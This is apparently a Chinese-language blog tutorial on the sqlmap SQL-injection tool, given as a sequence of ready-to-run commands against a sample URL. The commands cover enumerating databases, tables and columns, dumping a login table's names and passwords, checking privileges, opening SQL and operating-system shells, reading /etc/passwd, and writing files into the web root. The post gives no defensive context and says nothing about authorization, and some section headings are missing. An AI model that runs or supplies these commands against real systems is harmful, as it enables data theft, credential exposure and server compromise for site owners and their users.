Sqlmap注入教程-3篇常见SQLMAP使用方法(必备命令)
Sqlmap是一个专业的SQL注入工具,用法也很多,具体可以用"sqlmap -hh"查看完整的命令帮助文档,我这只是给大家分享一些最常用的Sqlmap用法。
博主是使用的之前发过的免Python环境的sqlmap:https://www.yujianxinliu.com/post-137.html,本文均在windows环境下运行成功。
一、Sqlmap注入篇
1、检查注入点
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --dbs
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --current-db
3、列出指定数据库所有的表名
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin --tables
'edwiin' 为指定数据库名称
4、列出指定表名的所有列名
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin -T tlogin --columns
'tlogin' 为指定表名称
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin -T tlogin -C name,password --dump
二、Sqlmap用户权限篇
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --users
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --current-user
2、判断当前用户是否是DBA?
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --is-dba
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --privileges
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --privileges -U edwiin
三、Sqlmap文件操作与shell提权篇
这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --sql-shell
sql-shell> select version();
注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;
2、cmd shell
这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --os-shell
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --os-cmd=ipconfig
3、读取服务器上指定文件
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-read=/etc/passwd
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-read=d:/test.txt
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
您阅读这篇文章共花了: